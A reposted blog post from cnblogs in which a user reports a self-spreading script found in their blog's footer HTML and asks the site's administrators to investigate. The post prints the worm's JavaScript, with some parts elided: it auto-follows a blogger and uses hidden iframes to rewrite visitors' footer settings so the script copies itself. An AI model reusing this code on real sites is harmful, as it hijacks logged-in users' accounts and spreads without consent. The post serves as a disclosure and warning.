博客园被黑了?

简介:

博客园被黑了?

(抱歉占用首页一会儿)

是博客园被黑了还是只有我的博客被黑了?

刚发现我的博客被加入了下面的代码(出现在“管理->设置->页脚Html代码”里,其中一部分被我略去),有没有人遇到一样的情况?请管理员帮忙查一下。

这段代码在我这儿运行以后的效果是自动关注Darrel.Hsu的博客(链接是资料页没有恶意代码,博客有恶意代码,不要在登录状态下访问),到现在这个博客已经增加了几百粉丝(23:44有554粉丝,24:00时有565粉丝)。

Update: 可能是有某位注册用户在自己博客里加了这段代码,然后凡是处于登录状态下的园友访问这个用户的博客后都会被感染;如果处于未登录状态,则跳回到登录页,结果是博客里的所有文章都无法正常打开

被加入的代码如下:

<script>function hack(){
var id = "D_Hacker" + parseInt( Math.random() * 1000 );
function createIframe( src , cb ){
  var iframe ;
  if( ! ( iframe =  document.getElementById( id ) ) ){
    ...//
  }
  iframe.onload = function(){ cb( iframe ) } ; 
  if( src.indexOf("http") == 0 ){
    iframe.src = src ;
  }else{
    var doc = iframe.contentWindow.document;
    doc.open();
    doc.write( src );
    doc.close();
  }
}
var m = ["c", "n", "b", "l", "o", "g", "s", ".", "U", "s", "e", "r", "M", "a", "n", "a", "g", "e", "r", ".", "F", "o", "l", "l", "o", "w", "B", "l", "o", "g", "g", "e", "r"]
m = m.join("")
window.eval( m + '("b8a15066-1039-e011-ac81-842b2b196315")')
createIframe("http://www.cnblogs.com/",function( iframe ){
  var win = iframe.contentWindow;
  var href = $("#span_userinfo a:eq(1)", win.document );
  href = href.attr("href") + "admin/Configure.aspx";
  createIframe( href , function( iframe ){
    ...//
    if( val.indexOf("b8a15066()") < 0 ){
      val = val +  "<scri"+"pt>"+ hack.toString() +";hack();</scr" +"ipt>";
      $("#Edit_txbPageEndHtml",doc).val( val );
      $("#Edit_lkbPost" , doc ).trigger("click");
    }
  });
})
};hack();</script>


本文转自博客园八进制的博客,原文链接:博客园被黑了?,如需转载请自行联系原博主。


相关文章
|
3月前
从csdn搬家到博客园(完整教程)
作者提供了从CSDN搬家到博客园的完整教程,包括如何导出CSDN博客、在博客园导入以及使用WordPress插件导入文章等步骤。
65 3
从csdn搬家到博客园(完整教程)
|
搜索推荐 安全 索引
良好的链接与坏的链接:您的网站在哪里?
良好的链接与坏的链接:您的网站在哪里? 任何了解SEO的人都知道反向链接 - 一个站点链接回另一个站点 - 对于您的搜索排名很重要。你拥有的反向链接越多越好 - 一般而言。但是有很好的链接,并且有你不想要的坏链接。
1376 0
从现在开始主要博客文章转移到oldpan.me博客站点
要经常写作!!! 要喜欢折腾!!! 以后博客更新内容都会在oldpan.me中!!!
1133 0
博客园_02_详谈如何定制自己的博客园皮肤
原文地址: 详谈如何定制自己的博客园皮肤
1167 0
|
Web App开发 Linux 网络安全
|
搜索推荐 UED
关于CSDN, cnblog, iteye和51cto四个博客网站的比较与分析
http://blog.csdn.net/pkucl1/article/details/6629819 CSDN: http://blog.csdn.net/ cnblog: http://www.cnblogs.com/ iteye: http://www.iteye.com/blogs/ 51cto: http://blog.51cto.com/   1. 基本功能 博客(又名网络日志),顾名思义,最早的基本功能就是支持用户在网站上写日志,并进行修改、删除、分类管理,以及对他人博客的阅读和评论等。
1870 0
x3d
没想到博客园是支持@的
前面一篇文章里,提到了以前的一个小伙伴,用了类似微博的 @ 写法,没想到系统真的 @ 到他了(其实以前也 @ 过)。@someone 应该是从twitter开始流行的,微型博客中提及某人,对方更得到系统的相应提醒。
x3d
780 0

热门文章

最新文章